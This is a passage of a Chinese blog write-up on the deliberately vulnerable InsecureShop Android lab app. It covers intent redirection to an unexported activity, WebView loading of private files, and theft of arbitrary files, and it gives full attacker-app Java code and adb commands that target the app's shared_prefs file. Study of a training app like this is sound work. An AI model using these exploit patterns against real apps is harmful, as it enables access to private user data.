Log.d(<span class="string">&quot;MainInterface&quot;</span>, <span class="string">&quot;Command Output: &quot;</span> + output.toString());</span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>根据操作系统版本进行更换</p>
<p><img src="/../imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_2pvnImPG9-.png" alt="183e7c086b3081bf800fe3e88ab4f232&#x2F;Pulrgximageimage_2pvnImPG9-.png"></p>
<p>编辑apk，安装</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">adb install debug/app-debug.apk</span><br></pre></td></tr></table></figure>

<p>查看日志</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">OnePlus5T:/ ## cd /data/data/com.insecureshopOnePlus5T:/data/data/com.insecureshop ## ls</span><br><span class="line">app_textures  app_webview  cache  code_cache  shared_prefs</span><br><span class="line">OnePlus5T:/data/data/com.insecureshop ## logcat | grep <span class="string">&quot;MainInterface&quot;</span><span class="number">01</span>-<span class="number">22</span> <span class="number">16</span>:<span class="number">16</span>:<span class="number">57.386</span>  <span class="number">6422</span>  <span class="number">6422</span> D MainInterface: Command Output: u0_a191</span><br><span class="line"><span class="number">01</span>-<span class="number">22</span> <span class="number">16</span>:<span class="number">16</span>:<span class="number">57.386</span>  <span class="number">6422</span>  <span class="number">6422</span> D MainInterface: app_textures</span><br><span class="line"><span class="number">01</span>-<span class="number">22</span> <span class="number">16</span>:<span class="number">16</span>:<span class="number">57.386</span>  <span class="number">6422</span>  <span class="number">6422</span> D MainInterface: app_webview</span><br><span class="line"><span class="number">01</span>-<span class="number">22</span> <span class="number">16</span>:<span class="number">16</span>:<span class="number">57.386</span>  <span class="number">6422</span>  <span class="number">6422</span> D MainInterface: cache</span><br><span class="line"><span class="number">01</span>-<span class="number">22</span> <span class="number">16</span>:<span class="number">16</span>:<span class="number">57.386</span>  <span class="number">6422</span>  <span class="number">6422</span> D MainInterface: code_cache</span><br><span class="line"><span class="number">01</span>-<span class="number">22</span> <span class="number">16</span>:<span class="number">16</span>:<span class="number">57.386</span>  <span class="number">6422</span>  <span class="number">6422</span> D MainInterface: shared_prefs</span><br></pre></td></tr></table></figure>

<p><img src="/../imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximage0122_zwr_-2rCSw.gif" alt="183e7c086b3081bf800fe3e88ab4f232&#x2F;Pulrgximage0122_zwr_-2rCSw.gif"></p>
<h2 id="访问受保护的组件"><a href="#访问受保护的组件" class="headerlink" title="访问受保护的组件"></a><strong>访问受保护的组件</strong></h2><p>应用程序接收嵌入的Intent并将其传递给如startActivity方法。这允许任何第三方应用程序启动任何受保护的组件。</p>
<p>正如挑战描述所建议的，应该有一个意图传递给<code>startActivity</code>函数。我搜索了代码，在<code>com.insecureshop.WebView2Activity</code><br>中发现了以下这段引起了我的注意：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> <span class="keyword">void</span> <span class="title function_">onCreate</span><span class="params">(Bundle savedInstanceState)</span> &#123;</span><br><span class="line">    <span class="built_in">super</span>.onCreate(savedInstanceState);</span><br><span class="line">    setContentView(R.layout.activity_webview);</span><br><span class="line">    setSupportActionBar(findViewById(R.id.toolbar));</span><br><span class="line">    setTitle(R.string.webview);</span><br><span class="line">    <span class="type">Intent</span> <span class="variable">extraIntent</span> <span class="operator">=</span> getIntent().getParcelableExtra(<span class="string">&quot;extra_intent&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span> (extraIntent != <span class="literal">null</span>) &#123;</span><br><span class="line">        startActivity(extraIntent);</span><br><span class="line">        finish();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;```</span><br><span class="line"></span><br><span class="line">这里的代码正在等待接收一个带有键 `extra_intent` 的 Intent，但危险的部分在于接收到的 Intent 被传递给了 `startActivity`</span><br><span class="line">函数，这将允许我们访问应用程序中的任何 Intent，即使它没有被导出。让我们在我们的应用中查找这样的 Activity：</span><br><span class="line"></span><br><span class="line">```jsx</span><br><span class="line">&lt;activity</span><br><span class="line">    android:name=<span class="string">&quot;com.insecureshop.PrivateActivity&quot;</span> android:exported=<span class="string">&quot;false&quot;</span>/&gt;</span><br></pre></td></tr></table></figure>

<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">onCreate</span><span class="params">(Bundle savedInstanceState)</span> &#123;</span><br><span class="line">    <span class="type">String</span> <span class="variable">data</span> <span class="operator">=</span> getIntent().getStringExtra(<span class="string">&quot;url&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span> (data == <span class="literal">null</span>) &#123;</span><br><span class="line">        data = <span class="string">&quot;https://www.insecureshopapp.com&quot;</span>; </span><br><span class="line">    &#125;</span><br><span class="line">    webview.loadUrl(data);</span><br><span class="line">    Prefs.INSTANCE.getInstance(<span class="built_in">this</span>).setData(data);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><code>PrivateActivity</code> 是一个未导出的活动，不能直接访问，因此我们可以利用 <code>WebView2Activity</code> 中出现的漏洞来访问它。我们有两种方法可以利用这个漏洞：使用<br>ADB AM 命令或创建一个攻击应用程序。不幸的是，我尝试了很多次 am 命令，但没能找到正确的命令。所以让我们创建一个攻击应用程序。我将通过<br>Android Studio 创建一个带有空活动的应用程序，并添加以下代码：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.insecureshop2;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> android.content.Intent;</span><br><span class="line"><span class="keyword">import</span> android.os.Bundle;</span><br><span class="line"><span class="keyword">import</span> android.view.View;</span><br><span class="line"><span class="keyword">import</span> android.widget.Button;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> androidx.activity.EdgeToEdge;</span><br><span class="line"><span class="keyword">import</span> androidx.appcompat.app.AppCompatActivity;</span><br><span class="line"><span class="keyword">import</span> androidx.core.graphics.Insets;</span><br><span class="line"><span class="keyword">import</span> androidx.core.view.ViewCompat;</span><br><span class="line"><span class="keyword">import</span> androidx.core.view.WindowInsetsCompat;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">MainActivity</span> <span class="keyword">extends</span> <span class="title class_">AppCompatActivity</span> &#123;</span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">protected</span> <span class="keyword">void</span> <span class="title function_">onCreate</span><span class="params">(Bundle savedInstanceState)</span> &#123;</span><br><span class="line">        <span class="built_in">super</span>.onCreate(savedInstanceState);</span><br><span class="line">        setContentView(R.layout.activity_main);</span><br><span class="line">        <span class="type">Button</span> <span class="variable">IntentButton</span> <span class="operator">=</span> (Button) findViewById(R.id.button);</span><br><span class="line">        <span class="comment">// Set a click listener to send the intent</span></span><br><span class="line">        IntentButton.setOnClickListener(<span class="keyword">new</span> <span class="title class_">View</span>.OnClickListener() &#123;</span><br><span class="line">            <span class="meta">@Override</span></span><br><span class="line">            <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">onClick</span><span class="params">(View v)</span> &#123;</span><br><span class="line">                <span class="comment">// Making an Intent to the PrivateActivity with the extra &quot;url&quot;</span></span><br><span class="line">                <span class="type">Intent</span> <span class="variable">privateActivityIntent</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Intent</span>();</span><br><span class="line">                privateActivityIntent.setClassName(<span class="string">&quot;com.insecureshop&quot;</span>, <span class="string">&quot;com.insecureshop.PrivateActivity&quot;</span>);</span><br><span class="line">                privateActivityIntent.putExtra(<span class="string">&quot;url&quot;</span>, <span class="string">&quot;https://www.baidu.com&quot;</span>);</span><br><span class="line"></span><br><span class="line">                <span class="comment">// Passing the whole intent to the extra_intent So we trigger the startActivity in the WebView2Activity class</span></span><br><span class="line">                <span class="type">Intent</span> <span class="variable">webViewIntent</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Intent</span>();</span><br><span class="line">                webViewIntent.setClassName(<span class="string">&quot;com.insecureshop&quot;</span>, <span class="string">&quot;com.insecureshop.WebView2Activity&quot;</span>);</span><br><span class="line">                webViewIntent.putExtra(<span class="string">&quot;extra_intent&quot;</span>, privateActivityIntent);</span><br><span class="line">                startActivity(webViewIntent);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;```</span><br><span class="line"></span><br><span class="line">添加button</span><br><span class="line"></span><br><span class="line">![183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_KoJW88-lC1.png](../imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_KoJW88-lC1.png)</span><br><span class="line"></span><br><span class="line">利用演示</span><br><span class="line"></span><br><span class="line">![183e7c086b3081bf800fe3e88ab4f232/Pulrgximage0121_EEEKdY5NTA.gif](../imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximage0121_EEEKdY5NTA.gif)</span><br><span class="line"></span><br><span class="line">## **未受保护的数据URI**</span><br><span class="line"></span><br><span class="line">通过loadUrl方法传递的不受信任的URI允许攻击者在webview中传递任意URL。</span><br><span class="line"></span><br><span class="line">这个挑战与其他挑战类似，我们在 `com.insecureshop.WebView2Activity` 中有一个被导出的隐式 Intent。但这次它接受我们传入的任何值，并尝试用</span><br><span class="line">WebView 加载，这意味着我们也可以访问内部文件。</span><br><span class="line"></span><br><span class="line">```java</span><br><span class="line"> <span class="type">Intent</span> <span class="variable">intent</span> <span class="operator">=</span> getIntent();</span><br><span class="line">        Intrinsics.checkExpressionValueIsNotNull(intent, <span class="string">&quot;intent&quot;</span>);</span><br><span class="line">        <span class="type">String</span> <span class="variable">dataString</span> <span class="operator">=</span> intent.getDataString();</span><br><span class="line">        <span class="keyword">if</span> (!(dataString == <span class="literal">null</span> || StringsKt.isBlank(dataString))) &#123;</span><br><span class="line">            <span class="type">Intent</span> <span class="variable">intent2</span> <span class="operator">=</span> getIntent();</span><br><span class="line">            Intrinsics.checkExpressionValueIsNotNull(intent2, <span class="string">&quot;intent&quot;</span>);</span><br><span class="line">            webview.loadUrl(intent2.getDataString());</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;```</span><br><span class="line"></span><br><span class="line">```java</span><br><span class="line">adb shell  am start -n com.insecureshop/.WebView2Activity -d file:<span class="comment">///data/data/com.insecureshop/shared_prefs/Prefs.xml</span></span><br></pre></td></tr></table></figure>

<p><img src="/../imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_en3-Hbq6NK.png" alt="183e7c086b3081bf800fe3e88ab4f232&#x2F;Pulrgximageimage_en3-Hbq6NK.png"></p>
<h2 id="任意文件窃取"><a href="#任意文件窃取" class="headerlink" title="任意文件窃取"></a><strong>任意文件窃取</strong></h2><p>通过ChooserActivity可以窃取应用程序本地存储中的文件。</p>
<p>找到相应代码</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">final</span> <span class="keyword">class</span> <span class="title class_">ChooserActivity</span> <span class="keyword">extends</span> <span class="title class_">AppCompatActivity</span> &#123;</span><br><span class="line">    <span class="keyword">private</span> HashMap _$_findViewCache;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> _$_clearFindViewByIdCache() &#123;</span><br><span class="line">        <span class="type">HashMap</span> <span class="variable">hashMap</span> <span class="operator">=</span> <span class="built_in">this</span>._$_findViewCache;</span><br><span class="line">        <span class="keyword">if</span> (hashMap != <span class="literal">null</span>) &#123;</span><br><span class="line">            hashMap.clear();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> View _$_findCachedViewById(<span class="type">int</span> i) &#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">this</span>._$_findViewCache == <span class="literal">null</span>) &#123;</span><br><span class="line">            <span class="built_in">this</span>._$_findViewCache = <span class="keyword">new</span> <span class="title class_">HashMap</span>();</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="type">View</span> <span class="variable">view</span> <span class="operator">=</span> (View) <span class="built_in">this</span>._$_findViewCache.get(Integer.valueOf(i));</span><br><span class="line">        <span class="keyword">if</span> (view != <span class="literal">null</span>) &#123;</span><br><span class="line">            <span class="keyword">return</span> view;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="type">View</span> <span class="variable">findViewById</span> <span class="operator">=</span> findViewById(i);</span><br><span class="line">        <span class="built_in">this</span>._$_findViewCache.put(Integer.valueOf(i), findViewById);</span><br><span class="line">        <span class="keyword">return</span> findViewById;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span> <span class="comment">// androidx.appcompat.app.AppCompatActivity, androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity</span></span><br><span class="line">    <span class="keyword">protected</span> <span class="keyword">void</span> <span class="title function_">onCreate</span><span class="params">(Bundle savedInstanceState)</span> &#123;</span><br><span class="line">        <span class="built_in">super</span>.onCreate(savedInstanceState);</span><br><span class="line">        setContentView(C0781R.layout.activity_chooser);</span><br><span class="line">        <span class="type">Intent</span> <span class="variable">intent</span> <span class="operator">=</span> getIntent();</span><br><span class="line">        Intrinsics.checkExpressionValueIsNotNull(intent, <span class="string">&quot;intent&quot;</span>);</span><br><span class="line">        <span class="keyword">if</span> (intent.getExtras() != <span class="literal">null</span>) &#123;</span><br><span class="line">            <span class="type">Parcelable</span> <span class="variable">parcelableExtra</span> <span class="operator">=</span> getIntent().getParcelableExtra(<span class="string">&quot;android.intent.extra.STREAM&quot;</span>);</span><br><span class="line">            <span class="keyword">if</span> (parcelableExtra == <span class="literal">null</span>) &#123;</span><br><span class="line">                <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">TypeCastException</span>(<span class="string">&quot;null cannot be cast to non-null type android.net.Uri&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="type">Uri</span> <span class="variable">uri</span> <span class="operator">=</span> Uri.fromFile(<span class="keyword">new</span> <span class="title class_">File</span>(((Uri) parcelableExtra).toString()));</span><br><span class="line">            Intrinsics.checkExpressionValueIsNotNull(uri, <span class="string">&quot;Uri.fromFile(File(uri.toString()))&quot;</span>);</span><br><span class="line">            makeTempCopy(uri, getFilename(uri));</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">final</span> Uri <span class="title function_">makeTempCopy</span><span class="params">(Uri fileUri, String original_filename)</span> &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="type">StringBuilder</span> <span class="variable">sb</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">StringBuilder</span>();</span><br><span class="line">            <span class="type">File</span> <span class="variable">externalStorageDirectory</span> <span class="operator">=</span> Environment.getExternalStorageDirectory();</span><br><span class="line">            Intrinsics.checkExpressionValueIsNotNull(externalStorageDirectory, <span class="string">&quot;Environment.getExternalStorageDirectory()&quot;</span>);</span><br><span class="line">            sb.append(externalStorageDirectory.getAbsolutePath());</span><br><span class="line">            sb.append(File.separator);</span><br><span class="line">            sb.append(<span class="string">&quot;insecureshop&quot;</span>);</span><br><span class="line">            <span class="type">String</span> <span class="variable">path</span> <span class="operator">=</span> sb.toString();</span><br><span class="line">            <span class="type">File</span> <span class="variable">directory</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">File</span>(path);</span><br><span class="line">            <span class="keyword">if</span> (!directory.exists()) &#123;</span><br><span class="line">                directory.mkdirs();</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="type">File</span> <span class="variable">fileTemp</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">File</span>(path, original_filename);</span><br><span class="line">            fileTemp.createNewFile();</span><br><span class="line">            <span class="type">Uri</span> <span class="variable">fromFile</span> <span class="operator">=</span> Uri.fromFile(fileTemp);</span><br><span class="line">            <span class="type">InputStream</span> <span class="variable">openInputStream</span> <span class="operator">=</span> getContentResolver().openInputStream(fileUri);</span><br><span class="line">            <span class="type">OutputStream</span> <span class="variable">openOutputStream</span> <span class="operator">=</span> getContentResolver().openOutputStream(fromFile);</span><br><span class="line">            <span class="type">byte</span>[] bArr = <span class="keyword">new</span> <span class="title class_">byte</span>[<span class="number">8192</span>];</span><br><span class="line">            <span class="keyword">while</span> (<span class="literal">true</span>) &#123;</span><br><span class="line">                <span class="type">Integer</span> <span class="variable">len</span> <span class="operator">=</span> openInputStream != <span class="literal">null</span> ? Integer.valueOf(openInputStream.read(bArr)) : <span class="literal">null</span>;</span><br><span class="line">                <span class="keyword">if</span> (len != <span class="literal">null</span> &amp;&amp; len.intValue() == -<span class="number">1</span>) &#123;</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">if</span> (len != <span class="literal">null</span>) &#123;</span><br><span class="line">                    <span class="type">int</span> <span class="variable">it</span> <span class="operator">=</span> len.intValue();</span><br><span class="line">                    <span class="keyword">if</span> (openOutputStream != <span class="literal">null</span>) &#123;</span><br><span class="line">                        openOutputStream.write(bArr, <span class="number">0</span>, it);</span><br><span class="line">                    &#125;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">final</span> String <span class="title function_">getFilename</span><span class="params">(Uri uri)</span> &#123;</span><br><span class="line">        Intrinsics.checkParameterIsNotNull(uri, <span class="string">&quot;uri&quot;</span>);</span><br><span class="line">        <span class="type">String</span> <span class="variable">fileName</span> <span class="operator">=</span> (String) <span class="literal">null</span>;</span><br><span class="line">        <span class="type">Context</span> <span class="variable">context</span> <span class="operator">=</span> getApplicationContext();</span><br><span class="line">        <span class="type">String</span> <span class="variable">scheme</span> <span class="operator">=</span> uri.getScheme();</span><br><span class="line">        <span class="keyword">if</span> (Intrinsics.areEqual(scheme, <span class="string">&quot;file&quot;</span>)) &#123;</span><br><span class="line">            <span class="keyword">return</span> uri.getLastPathSegment();</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (Intrinsics.areEqual(scheme, <span class="string">&quot;content&quot;</span>)) &#123;</span><br><span class="line">            String[] proj = &#123;<span class="string">&quot;_display_name&quot;</span>&#125;;</span><br><span class="line">            Intrinsics.checkExpressionValueIsNotNull(context, <span class="string">&quot;context&quot;</span>);</span><br><span class="line">            <span class="type">Cursor</span> <span class="variable">cursor</span> <span class="operator">=</span> context.getContentResolver().query(uri, proj, <span class="literal">null</span>, <span class="literal">null</span>, <span class="literal">null</span>);</span><br><span class="line">            <span class="keyword">if</span> (cursor != <span class="literal">null</span> &amp;&amp; cursor.getCount() != <span class="number">0</span>) &#123;</span><br><span class="line">                <span class="type">int</span> <span class="variable">columnIndex</span> <span class="operator">=</span> cursor.getColumnIndexOrThrow(<span class="string">&quot;_display_name&quot;</span>);</span><br><span class="line">                cursor.moveToFirst();</span><br><span class="line">                <span class="keyword">return</span> cursor.getString(columnIndex);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">return</span> fileName;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> fileName;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;```</span><br><span class="line"></span><br><span class="line">代码有点长，但我们来逐步解析，从 Intent 开始：</span><br><span class="line"></span><br><span class="line">- 检查 Intent 是否有额外的数据，并特别查找键为 `android.intent.extra.STREAM` 的额外数据。</span><br><span class="line">- **`<span class="type">Parcelable</span> <span class="variable">parcelableExtra</span> <span class="operator">=</span> getIntent().getParcelableExtra(<span class="string">&quot;android.intent.extra.STREAM&quot;</span>)`**: 从 Intent 中获取键为</span><br><span class="line">  `android.intent.extra.STREAM` 的 Parcelable 额外数据。这通常用于在组件之间传递复杂的数据。</span><br><span class="line">- **`<span class="type">Uri</span> <span class="variable">uri</span> <span class="operator">=</span> Uri.fromFile(<span class="keyword">new</span> <span class="title class_">File</span>(((Uri) parcelableExtra).toString()))`**: 将 Parcelable 对象（应该是一个 `Uri`）转换为</span><br><span class="line">  `File` 对象，然后从该文件创建一个 `Uri`。这一行假设 Parcelable 额外数据是一个表示文件路径的 `Uri`。</span><br><span class="line">- 创建文件的临时副本，并使用 `makeTempCopy` 处理它。</span><br><span class="line"></span><br><span class="line">接下来是 **`makeTempCopy()`** 方法：</span><br><span class="line"></span><br><span class="line">- 创建由 `Uri` 指定的文件的临时副本。</span><br><span class="line">- 它读取原始文件的内容，并将其写入外部存储目录 (`/sdcard/insecureshop/`) 中的新文件。</span><br><span class="line"></span><br><span class="line">再来看 **`getFilename()`** 方法：</span><br><span class="line"></span><br><span class="line">- 该方法从 `Uri` 中确定文件名。</span><br><span class="line"></span><br><span class="line">基于以上信息，我们来创建一个示例的利用程序，以下代码将复制 `Prefs.xml` 文件作为一个例子：</span><br><span class="line"></span><br><span class="line">```java</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">MainActivity</span> <span class="keyword">extends</span> <span class="title class_">AppCompatActivity</span> &#123;</span><br><span class="line"><span class="meta">@Override</span></span><br><span class="line"><span class="keyword">protected</span> <span class="keyword">void</span> <span class="title function_">onCreate</span><span class="params">(Bundle savedInstanceState)</span> &#123;</span><br><span class="line">    <span class="built_in">super</span>.onCreate(savedInstanceState);</span><br><span class="line">    setContentView(R.layout.activity_main);</span><br><span class="line">    <span class="type">Button</span> <span class="variable">TheftofArbitraryFilesButton</span> <span class="operator">=</span> (Button) findViewById(R.id.TheftofArbitraryFiles);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Set a click listener to send the intent</span></span><br><span class="line">    TheftofArbitraryFilesButton.setOnClickListener(<span class="keyword">new</span> <span class="title class_">View</span>.OnClickListener() &#123;</span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">onClick</span><span class="params">(View v)</span> &#123;</span><br><span class="line">        <span class="type">Intent</span> <span class="variable">StealingFile</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Intent</span>();</span><br><span class="line">        <span class="comment">// Selecting the ChooserActivity</span></span><br><span class="line">        StealingFile.setClassName(<span class="string">&quot;com.insecureshop&quot;</span>, <span class="string">&quot;com.insecureshop.ChooserActivity&quot;</span>);</span><br><span class="line">        <span class="comment">// Specfiying the Prefs.xml file</span></span><br><span class="line">        <span class="type">Uri</span> <span class="variable">FileName</span> <span class="operator">=</span> Uri.parse(<span class="string">&quot;/data/data/com.insecureshop/shared_prefs/Prefs.xml&quot;</span>);</span><br><span class="line">        <span class="comment">// adding the EXTRA_STREAM as an extra to trigger the exported Intent</span></span><br><span class="line">        StealingFile.putExtra(StealingFile.EXTRA_STREAM, FileName);</span><br><span class="line">        <span class="comment">// Starting the Intent</span></span><br><span class="line">        startActivity(StealingFile);</span><br><span class="line">    &#125;</span><br><span class="line">    &#125;);</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>并没有复现成功</p>
<p><img src="/../imgs/183e7c086b3081bf800fe3e88ab4f232/Pulrgximageimage_6FKLgC2yfC.png" alt="183e7c086b3081bf800fe3e88ab4f232&#x2F;Pulrgximageimage_6FKLgC2yfC.png"></p>
<h2 id="使用具有已知漏洞的组件"><a href="#使用具有已知漏洞的组件" class="headerlink" title="使用具有已知漏洞的组件"></a><strong>使用具有已知漏洞的组件</strong></h2><p>识别应用程序中使用的易受攻击的组件或库，这些组件或库可能允许您将本地文件泄露到远程域。</p>
